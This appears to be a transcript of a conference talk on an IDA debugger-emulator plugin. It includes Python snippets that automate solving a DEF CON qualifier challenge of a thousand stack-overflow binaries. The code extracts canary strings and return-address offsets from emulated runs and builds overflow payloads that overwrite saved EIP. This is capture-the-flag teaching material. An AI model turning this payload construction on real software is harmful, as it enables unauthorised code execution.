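With Unicorn's Python bindings, each `(start, size)` pair would go to `Uc.mem_map`, the segment bytes to `Uc.mem_write`, and `initial_sp` to the stack pointer register via `Uc.reg_write`. Putting the stack above the highest segment can run off the end of a 32-bit address space, so a real loader would need a fallback for that case.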
And I'm not going to go into the ways you integrate what you have available in your debugger view with what you have in your static view, but suffice it to say, there are ways to pull information back across if you decide it's useful for augmenting what you have on the static side. The last thing I'm going to do is take a look at one of the challenges from the DEF CON qualifiers this year. In this challenge they gave you a thousand binaries, and when you went to interact with the competition, you had one minute to craft an exploit for whichever of these thousand binaries they gave you the file name for. So you downloaded a thousand binaries, and you had a minute to craft the exploit. It's going to take a long time to do all that by hand, so you want to automate this, and you want to have an answer in your hip pocket when they say, "Give me your exploit for binary number one." So how do you automate? Well, it turns out that all of these binaries have roughly the same pattern, and I'll describe it not by looking at the code, but by looking at the stack. There are two buffers in here, and the binaries differ in the location of that user input buffer in the stack relative to the saved return address, the size of that user input buffer, and the content that gets placed into what I've called a canary string right there. So they gave you a free overwrite out of that user input buffer, but you have to figure out how much you have to overwrite to clobber EIP. Doing that is not a problem; there's nothing hindering the overwrite. But they come back and verify that the canary string matches the original canary they placed in there, so as you do your overwrite, you've got to rewrite the canary, and it had better match the original string, and all thousand binaries have a different canary. It's not always obvious exactly how they set it: they compute it, they copy it in one byte at a time, they do a string copy; they do it a lot of different ways, but they always end up doing a string compare at the end. So if you can put a breakpoint at the string compare and hit it, it doesn't matter what you filled the buffer with. You can do some other computations to figure out the distance from the start of your buffer to the saved EIP, set a breakpoint on the string compare, look at the required argument sitting on the stack, and pick that out. These become your parameters: what does my canary have to be, and how far is it from saved EIP down to the buffer. There were a couple of other constants you needed to pick out, but I didn't want to do this a thousand times by hand. Nobody did, and there are some good write-ups about using other automated systems to solve this, but what I did was script up this emulator. Somewhere the script exists... down here. Because this is implemented as an IDA debugger, you get all of IDA's debugger scripting, and it can be used to drive this thing. So we write the script: we load the debugger, set some debugger options to break on start, run to the start address, and get the value of EIP. I'm picking out all of the arguments, all of the bits and pieces, from a dynamic environment, although I'm not actually running a process; I'm just emulating through it. By the time I get down to the bottom, I've picked out a bunch of parameters that I'm going to need, and I just took those parameters and wrote them out as a Python dictionary entry. So I had a dictionary of parameters keyed by the name of the binary, and when they told me which binary to exploit, I picked out its parameters, crafted my buffer, and fired it at them. What that looks like is this: we run IDA in batch mode. I'll be doing this one... which one... this one. So I've got two windows right here, and I'm tailing an output file in the bottom one. I'm going to use IDA in batch mode (you can see the long command line there), and I'm going to run the script I wrote against one of these thousand binaries. Well, in this directory there are three hundred of them; they all scroll up like that. Let's see if this will work. I'll make sure I clear out some stale files, namely, I've got to kill that IDA session, because it's going to get in the way of the batch run, and we'll try this out.
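The batch run comes down to one headless IDA invocation per binary, plus a results file that collects one dictionary entry per run. Here is a minimal sketch. It assumes the IDA switches `-A` (autonomous, no dialogs), `-S` (run a script), and `-L` (log file). It also assumes the IDAPython script exits IDA itself when it finishes, for example with `idc.qexit`. The executable name `idal` and the script name `extract_params.py` are placeholders, because both depend on the IDA version and your own setup.

```python
import ast
import os
import subprocess
from typing import Dict, List

IDA_EXE = "idal"  # placeholder: text-mode IDA binary name varies by version/platform
SCRIPT = "extract_params.py"  # placeholder: your IDAPython emulation script


def batch_commands(directory: str, ida_exe: str = IDA_EXE, script: str = SCRIPT) -> List[List[str]]:
    """One headless IDA command line per regular file in `directory`."""
    commands = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            # -A: autonomous (no dialogs), -S: run script, -L: log file
            commands.append([ida_exe, "-A", f"-S{script}", f"-L{name}.log", path])
    return commands


def run_all(directory: str) -> None:
    """Run IDA once per binary; each run is assumed to append one dict entry."""
    for command in batch_commands(directory):
        subprocess.run(command, check=False)  # inspect the logs rather than exit codes


def load_params(text: str) -> Dict[str, dict]:
    """Parse lines such as  'bin_0001': {'canary': b'XYZ', 'offset': 140},
    into one dictionary keyed by binary name, accepting literals only."""
    return ast.literal_eval("{" + text + "}")


if __name__ == "__main__":
    for command in batch_commands("."):
        print(" ".join(command))
```

Reading results with `ast.literal_eval` instead of `eval` means a malformed or hostile line cannot execute code. It accepts only literals such as strings, bytes, numbers, and dicts.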
You'll see IDA flash in the background, if everything works. So IDA's coming up in batch mode, we're in debugger mode, and it's done. You can see the output on the bottom: that quickly, it got into an emulation on that ELF binary, ran through main, picked off the parameters it needed, and dumped them out to me. Now I wrap that in a loop, do it for every file in the current directory, and I've got my thousand sets of exploit parameters and I'm ready to connect to the remote side. So, for the future, very quickly: a better user interface when launching the emulator. It would be nice to be able to specify some register state; right now I just take a guess. Where do you want to start your emulation? Do you want any registers to have particular values? I'd like to have that done. Also some options for mapping particular memory regions or loading other regions. If you're familiar with IDA and debuggers, there's a very useful interface called Appcall that lets you call functions almost natively from IDAPython: you call out, have your function run, and get the value back in your scripts. I'd like to have a hooking library, to be able to hook various functions and do something other than what the emulator's doing, or provide shims for library calls or system calls, things like that. And I'll perhaps also add the option to pull in all of the shared libraries that a dynamically linked binary might link to, so you can follow the library calls down into a shared library function and emulate your way through those if you want to, rather than writing all the shims for them. It's out there on GitHub today, and I will push all the latest changes shortly after the con. If you're interested, I'm always interested in feedback. If you want to collaborate, I'd love to hear from you. If you have ideas on features that might make it more useful and you don't want to implement them, at least share them with me, and maybe I'll get around to them or find somebody who'd like to implement them. And that's it. I'm happy to take questions, and if there are no questions, please enjoy the rest of your con. Thank you. Do we have microphones somewhere for questions? Yeah, yeah, I'm supposed to direct you to a microphone so it gets picked up; you can come up here if you want. The microphone is... oh, it's right here, it's right over here. Drink, don't forget your drink, that's right. Hello. A couple of slides back, you mentioned the two console output windows (that's the wrong way). How do you recognize which magic four bytes overwrite EIP, and how do you deal with bad characters? For the scripted demo, what I had to do was study a couple of the binaries manually. Not a thousand of them, but I looked at two or three. I looked at the first one and said, well, this is clearly an easy stack overflow, and if it were just this one, I understand exactly how I would exploit it. Then I looked at another one and said, oh, this one is subtly different; what's different about it, and can I develop an analysis that walks through the program and at certain key points picks off certain things for me? So what are the parameters, and where is that buffer getting copied? Really, the string compare gives it all away.
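Picking parameters off the stack at the string compare can be sketched without IDA or Unicorn. The helpers below are hypothetical and rest on several assumptions, none of which is confirmed for the actual challenge binaries:

- The code is 32-bit cdecl, so at a breakpoint on the `call` instruction the first two arguments sit at `[esp]` and `[esp+4]`.
- The first argument points at the stack canary buffer and the second at the expected string.
- The function uses an EBP-based frame, so the saved return address is at `ebp + 4`.
- The user buffer address is picked off an earlier call in the same way.
- The input path accepts NUL bytes.

```python
import struct
from dataclasses import dataclass
from typing import Tuple


@dataclass
class StackSnapshot:
    """Bytes read out of emulator memory, starting at address `base`."""

    base: int
    data: bytes

    def u32(self, addr: int) -> int:
        # Little-endian 32-bit value, as on x86.
        return struct.unpack_from("<I", self.data, addr - self.base)[0]

    def cstr(self, addr: int) -> bytes:
        # NUL-terminated string starting at addr (terminator not included).
        start = addr - self.base
        return self.data[start:self.data.index(b"\x00", start)]


def strcmp_args_at_call(mem: StackSnapshot, esp: int) -> Tuple[int, int]:
    """Breakpoint ON the `call strcmp`: cdecl args are at [esp] and [esp+4].
    (At strcmp's first instruction they would be at [esp+4] and [esp+8].)"""
    return mem.u32(esp), mem.u32(esp + 4)


def exploit_params(user_buf: int, canary_buf: int, ebp: int, canary: bytes) -> dict:
    saved_eip = ebp + 4  # assumes an EBP-based frame
    return {
        "canary_offset": canary_buf - user_buf,
        "ret_offset": saved_eip - user_buf,
        "canary": canary,
    }


def build_payload(params: dict, new_eip: int, fill: bytes = b"A") -> bytes:
    """Filler, the canary plus NUL (strcmp stops there), filler, then the new EIP.
    `fill` is expected to be a single byte."""
    head = fill * params["canary_offset"] + params["canary"] + b"\x00"
    pad = params["ret_offset"] - len(head)
    if pad < 0:
        raise ValueError("canary would overlap the saved return address")
    return head + fill * pad + struct.pack("<I", new_eip)


if __name__ == "__main__":
    data = bytearray(0x200)
    struct.pack_into("<II", data, 0, 0xBFFF0100, 0xBFFF0180)  # two pushed pointers
    data[0x180:0x187] = b"S3cr3t\x00"  # expected canary string
    mem = StackSnapshot(0xBFFF0000, bytes(data))
    canary_buf, expected = strcmp_args_at_call(mem, esp=0xBFFF0000)
    params = exploit_params(0xBFFF00C0, canary_buf, ebp=0xBFFF0118, canary=mem.cstr(expected))
    print(params)  # {'canary_offset': 64, 'ret_offset': 92, 'canary': b'S3cr3t'}
    print(build_payload(params, new_eip=0x08048500))
```

Once the addresses are known, the offsets are just differences between stack addresses, so in this model one emulated run per binary is enough.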
It tells me the start of the user buffer and the start of the canary buffer, and from there I can do some math to figure out where saved EIP was. Then the third binary: again, all of these look similar. So I took what I had learned from looking at three binaries, developed an automated process that I applied to those three binaries, and it extended nice and neatly to the thousand binaries, which was roughly what they intended. What they wanted was to force you to do it quickly; if you tried to reverse engineer all thousand to develop these answers, you wouldn't have finished in the weekend. Does that answer your question? Yeah, yeah. Now, I'm assuming that's logic you have to hard-code into the program, or does it auto-detect that? That's logic you have to bake into the script that you write. So through here are various things I was looking for: you see I'm extracting some register values, I'm stepping one instruction at a time, I'm asking whether I'm at certain types of instructions, and I'm counting the number of calls I've encountered, because the third call down the chain was going to be the strcpy, or rather the string compare. When I got there, you can see I'm picking off the arguments that have been placed on the stack to pass to the string compare, and then I'm using them to derive all the information I need to craft the exploit parameters. Okay, awesome, thank you. Sure. Any other questions? You trying to get me out of here? I think we're done. Thanks very much; I'll be happy to talk to you afterward at the side of the stage. Thank you.